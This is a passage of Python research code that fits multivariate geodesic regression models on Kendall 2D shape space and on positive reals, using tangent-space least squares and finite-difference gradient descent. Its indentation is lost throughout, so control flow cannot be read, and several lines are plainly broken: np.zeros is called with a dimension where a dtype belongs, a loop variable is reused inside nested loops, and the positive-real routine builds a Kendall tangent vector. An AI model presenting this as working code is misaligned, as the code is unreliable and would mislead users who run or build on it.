for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.kendall2D_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.kendall2D_tVec( nManifoldDim )
tangent_t_n = manifolds.kendall2D_tVec( nManifoldDim )
for par in range( nParam ):
for k in range( 2 ):
for d in range( nManifoldDim ):
tangent_t_n.tVector[ k, d ] += ( new_tVec_arr[ par ].tVector[ k, d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( tangent_t_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break;
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_Kendall2D( X, Y, beta0, p0_list, tVec_intercept_arr, cov_intercept_list, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0 or len( X[ 0 ] ) == 0 :
nManifoldDim = beta0.nPt
slope_tVec = manifolds.kendall2D_tVec( nManifoldDim )
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for k in range( 2 ):
for d in range( nManifoldDim ):
slope_tVec.tVector[ k, d ] += ( Y_i_tilde.tVector[ k, d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for k in range( 2 ):
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ k, d ] - Y_i.tVector[ k, d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.kendall2D_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = np.zeros( 2, nManifoldDim )
energy_k = 0
# Calculate FDM
for kkk in range( 2 ):
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.kendall2D_tVec( nManifoldDim )
slope_neg_eps = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ kk, dd ] = slope_tVec.tVector[ kk, dd ]
slope_neg_eps.tVector[ kk, dd ] = slope_tVec.tVector[ kk, dd ]
slope_pos_eps.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] + eps
slope_neg_eps.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ kk, dd ] = float( slope_pos_eps_at_p_i.tVector[ kk, dd ] - slope_neg_eps_at_p_i.tVector[ kk, dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ kk, dd ] = slope_parT_p_i.tVector[ kk, dd ] - Y_i.tVector[ kk, dd ]
dE[ kkk, d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
print( "dE[ kkk, d ] " )
print( dE[ kkk, d ] )
slope_tVec_updated.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] - ( stepSize * dE[ kkk, d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for k in range( 2 ):
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ k, d ] - Y_i.tVector[ k, d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter- 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
p_anchor = beta0
nManifoldDim = p_anchor.nPt
w_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
Y_j = Y[ j ]
# Parallel translate a group-wise tangent vector to population-level intercept
beta_tVec_f_i = manifolds.kendall2D_tVec( nManifoldDim )
for tt in range( len( cov_intercept_list[ j ] ) ):
est_beta_tt = tVec_intercept_arr[ tt ]
for kk in range( 2 ):
for dd in range( nManifoldDim ):
beta_tVec_f_i.tVector[ kk, dd ] += ( est_beta_tt.tVector[ kk, dd ] * cov_intercept_list[ j ][ tt ] )
f_j = beta0.ExponentialMap( est_beta_tt )
Y_j_at_f_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], f_j, Y_j )
Y_j_tilde = f_j.ParallelTranslateAtoB( f_j, beta0, Y_j_at_f_j )
tVec_j = Y_j_tilde
# Parallel translate a group-wise tangent vector to population-level intercept
# tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list[ k * nManifoldDim + d ].append( tVec_j.tVector[ k, d ] )
estModel_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ k * nManifoldDim + d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t
v_t = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_t.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ 0 ]
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_DirectKendall2D( X, Y, beta0, p0_list, tVec_intercept_arr, cov_intercept_list, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0 or len( X[ 0 ] ) == 0 :
nManifoldDim = beta0.nPt
slope_tVec = manifolds.kendall2D_tVec( nManifoldDim )
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for k in range( 2 ):
for d in range( nManifoldDim ):
slope_tVec.tVector[ k, d ] += ( Y_i_tilde.tVector[ k, d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for k in range( 2 ):
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ k, d ] - Y_i.tVector[ k, d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.kendall2D_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = np.zeros( 2, nManifoldDim )
energy_k = 0
# Calculate FDM
for kkk in range( 2 ):
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.kendall2D_tVec( nManifoldDim )
slope_neg_eps = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ kk, dd ] = slope_tVec.tVector[ kk, dd ]
slope_neg_eps.tVector[ kk, dd ] = slope_tVec.tVector[ kk, dd ]
slope_pos_eps.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] + eps
slope_neg_eps.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ kk, dd ] = float( slope_pos_eps_at_p_i.tVector[ kk, dd ] - slope_neg_eps_at_p_i.tVector[ kk, dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ kk, dd ] = slope_parT_p_i.tVector[ kk, dd ] - Y_i.tVector[ kk, dd ]
dE[ kkk, d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
print( "dE[ kkk, d ] " )
print( dE[ kkk, d ] )
slope_tVec_updated.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] - ( stepSize * dE[ kkk, d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for k in range( 2 ):
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ k, d ] - Y_i.tVector[ k, d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter- 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
p_anchor = beta0
nManifoldDim = p_anchor.nPt
w_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
# Parallel translate a group-wise tangent vector to population-level intercept
tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list[ k * nManifoldDim + d ].append( tVec_j.tVector[ k, d ] )
estModel_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ k * nManifoldDim + d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t
v_t = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_t.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ 0 ]
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
#################################################################################
### Positive Real Numbers ###
#################################################################################
def MultivariateLinearizedGeodesicRegression_PosReal_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression( t_list_g, pt_list_g )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ] )
# # Check R2
# mean_g = FrechetMean( pt_list[ g ] )
# sqDist_SG_sum = 0
# sqVar_sum = 0
# for i in range( len( pt_list[ g ] ) ):
# p_i = pt_list_g[ i ]
# t_i = t_list_g[ i ]
# slope_t_i = v_g.ScalarMultiply( t_i )
# est_p_i = p0_g.ExponentialMap( slope_t_i )
# tVec_est_p_i_to_p_i = est_p_i.LogMap( p_i )
# sqDist_i = tVec_est_p_i_to_p_i.normSquared()
# sqDist_SG_sum += sqDist_i
# tVec_mean_to_p_n = mean_g.LogMap( p_i )
# sqVar_n = tVec_mean_to_p_n.normSquared()
# sqVar_sum += sqVar_n
# R2_SG = 1 - ( sqDist_SG_sum / sqVar_sum )
# print( "Subject : " + str( g ) )
# print( str( nData_group[ g ] ) + " Obs." )
# print( R2_SG )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_PosReal( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_PosReal( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
def MultivariateLinearizedGeodesicRegression_Intercept_PosReal( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
if nParam == 0:
base = FrechetMean( Y )
tangent_arr = []
return base, tangent_arr
# Anchor point is chosen by the last entry of covariates
# Continuous variable such as a genetic disease score should be the last entry of covariates
# If data don't have a continuous covariates, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Set an anchor point
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.pos_real( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.pos_real_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[ d ].append( tVec_j.tVector[ d ] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.pos_real_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.pos_real_tVec( nManifoldDim )
tangent_t_n = manifolds.pos_real_tVec( nManifoldDim )
for par in range( nParam ):
for d in range( nManifoldDim ):
tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( tangent_t_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break;
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_PosReal( X, Y, beta0, p0_list, tVec_intercept_arr, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0 or len( X[ 0 ] ) == 0 :
nManifoldDim = beta0.nDim
slope_tVec = manifolds.pos_real_tVec( nManifoldDim )
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] += ( Y_i_tilde.tVector[ d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ d ] - Y_i.tVector[ d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = np.zeros( nManifoldDim )
energy_k = 0
# Calculate FDM
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.pos_real_tVec( nManifoldDim )
slope_neg_eps = manifolds.pos_real_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_neg_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_pos_eps.tVector[ d ] = slope_tVec.tVector[ d ] + eps
slope_neg_eps.tVector[ d ] = slope_tVec.tVector[ d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.pos_real_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ dd ] = float( slope_pos_eps_at_p_i.tVector[ dd ] - slope_neg_eps_at_p_i.tVector[ dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.kendall2D_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ dd ] = slope_parT_p_i.tVector[ dd ] - Y_i.tVector[ dd ]
dE[ d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ] - ( stepSize * dE[ d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ d ] - Y_i.tVector[ d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter- 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
p_anchor = beta0
nManifoldDim = p_anchor.nDim
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
# Parallel translate a group-wise tangent vector to population-level intercept
tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for d in range( nManifoldDim ):
w_list[ d ].append( tVec_j.tVector[ d ] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t
v_t = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_t.tVector[ d ] = estModel_list[ d ].params[ 0 ]
new_tVec_arr = []
for par in range( nParam ):
